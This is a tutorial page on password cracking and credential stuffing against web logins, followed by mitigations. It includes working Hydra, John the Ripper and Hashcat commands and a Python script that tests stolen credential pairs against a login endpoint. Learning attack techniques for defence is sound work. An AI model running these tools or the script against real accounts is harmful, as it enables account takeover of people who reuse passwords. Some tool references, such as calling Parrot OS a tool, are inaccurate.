Skip to content

Credential Stuffing

Web applications often rely on password-based authentication, making weak or reused credentials a critical attack surface. This section explores techniques for exploiting password vulnerabilities, including brute-force attacks and credential stuffing, along with tools and strategies to mitigate these risks.


Password Cracking Techniques

Password cracking involves systematically guessing or deriving credentials to bypass authentication. Common methods include:

1. Brute-force and Dictionary Attacks

Tools like Hydra, John the Ripper, and Hashcat automate guessing passwords by leveraging dictionaries or character combinations.
- Hydra targets protocols like HTTP-FORM-POST or SSH:

hydra -t 4 -l admin -P /path/to/passwords.txt http-post-form "/login:username=^USER^&password=^PASS^:F=error" target.com
- John the Ripper cracks local hashes (e.g., from database dumps):
john --wordlist=/path/to/dictionary.txt hashes.txt
- Hashcat uses GPU acceleration for cracking:
hashcat -a 0 -m 0 hashfile.hashes /path/to/dictionary.txt

2. Rainbow Tables

Precomputed hash-value tables (e.g., for MD5, SHA-1) allow rapid lookup of hashes. Tools like rkhash or Rcrack can exploit these.

3. Password Spraying

Attackers guess common passwords (e.g., "Password123") against multiple accounts to bypass rate limits.


Credential Stuffing

Credential stuffing leverages stolen credentials from data breaches to automate login attempts. Tools like Parrot OS or custom scripts (e.g., Python) are used:

import requests
with open("credentials.txt", "r") as f:
    for line in f:
        username, password = line.strip().split(":")
        response = requests.post("https://target.com/login", data={"user": username, "pass": password})
        if "success" in response.text:
            print(f"Valid credentials: {username}:{password}")
This technique exploits users reusing passwords across services.


Mitigation Strategies

Defenders should implement:
1. Strong Password Policies: Enforce complexity, length, and expiration. Example regex for minimum complexity:

^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[!@#$%^&*]).{12,}$
2. Rate Limiting & Account Lockouts: Prevent brute-force attempts by limiting login retries.
3. Multi-Factor Authentication (MFA): Add layers beyond passwords (e.g., TOTP).
4. Monitoring: Detect anomalies (e.g., login attempts from new IPs).


Key takeaways

  • Password cracking tools like Hydra and Hashcat exploit weak or reused credentials.
  • Credential stuffing uses stolen credentials from breaches to bypass authentication.
  • Defenders must enforce strong password policies, MFA, and rate limiting to mitigate these risks.